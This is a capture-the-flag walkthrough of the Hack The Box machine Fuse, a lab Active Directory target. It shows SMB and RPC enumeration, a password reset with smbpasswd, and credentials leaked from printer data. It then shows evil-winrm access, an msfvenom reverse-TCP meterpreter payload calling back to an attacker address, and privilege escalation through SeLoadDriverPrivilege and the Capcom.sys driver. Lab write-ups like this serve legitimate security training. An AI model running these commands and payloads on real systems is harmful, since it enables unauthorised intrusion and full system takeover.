SecWalk.com

HTB Walkthrough Fuse 10.10.10.193

Box Summary:

Fuse has been released on 13th of june in 2020 Fuse is rated as Medium.

From nmap we can see we are dealing with a AD machine, after visiting port 80 we get redirected to a DNS name, adding this DNS name to our HOST file and we were able to view the page, it’s a printer page wich contains print job history with value data like usernames. After poking around a bit we could concluded we needed a password, sinds Kerbroasting attack didn’t work we needed something else. after trying a lot we created a password list from the CSV files from the print page site, turns out there is a valid password in there but the users need to change their password. after password change we were able to enumerate the machine and found some other creds wich gave us a shell by using evil-winrm after login we were able to get the user flag. This user has SeLoadDriverPrivilege enabled wich made us administrator on this machine.

Enumeration

nmap -sV -sC 10.10.10.193

Web Page

In order to access the webpage, we need to following to /etc/hosts:

fuse.fabricorp.local

When we go to the webpage, we see the following:

By reviewing the CSV files, I found several users:

Users found:

  • pmerton
  • tlavel
  • stompson
  • bhult
  • administrator
  • bnielson

Enumerating SMB shares

I tried with crackmapexec to enumerate SMB shares with the found usernames. But that was no success.

smb –shares usernames.txt 10.10.10.193

After this I tried if I could login with one of these found usernames.

I tried some common password, also I used the CSV files.

rpcclient -U bhult 10.10.10.193 Fabricorp01

Changing RPC password

smbpasswd -r 10.10.10.193 -U bhult

rpcclient -U bhult 10.10.10.193

Enumerating Users

svc-print user, we need to keep that in mind.

enumdomusers

Enumerating Printers

Enumprinters

We found a password:

$fab@s3Rv1ce$1

Exploitation

Now we have credentials, we can use evil-winrm to login with. The only user that could login with the password($fab@s3Rv1ce$1) was svc_print.

Post-Exploitaion

I checked if we can use tokens in order to escalate our privileges.

We can see that SeLoadDriverPrivilege is enabled.

whoami /priv

Resource: https://github.com/IceL0rd4Real/EoPLoadDriver

We need to follow the instruction which this GitHub page is telling us.

Note: This Github page is owned by IceL0rd. Secwalk won’t/can’t be responsible for any damage or the content.

Uploading Capcom.sys and eoploaddriver64.exe

upload Capcom.sys

upload eoploaddriver64.exe

Before we run this, we need to make an MSF payload which gives is a meterpreter shell.

Getting Meterpreter Shell

In order to generate a meterpreter payload we need to use the following command.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe -o meterpreter.exe

Now we upload this to the system.

upload meterpreter.exe

Setting up handler in Metasploit.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
exploit -j

Now we run meterpreter.exe and we getting a meterpreter shell.

Now we run eoploaddriver64.exe in our evil-winrm shell

./eoploaddriver64.exe System\CurrentControlSet\custom C:\Users\svcprint\Documents\Capcom.sys

Now we have an error, but that’s why we need to use Metasploit, Metasploit has an local exploit that you can abuse this too, we just turned this function to enabled.

Back to our meterpreter session.

use exploit/windows/local/capcom_sys_exec

set session 1

But to to get this to work we need to edit this script.

Edit

We disable the check function.

Now we have rooted the machine.

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply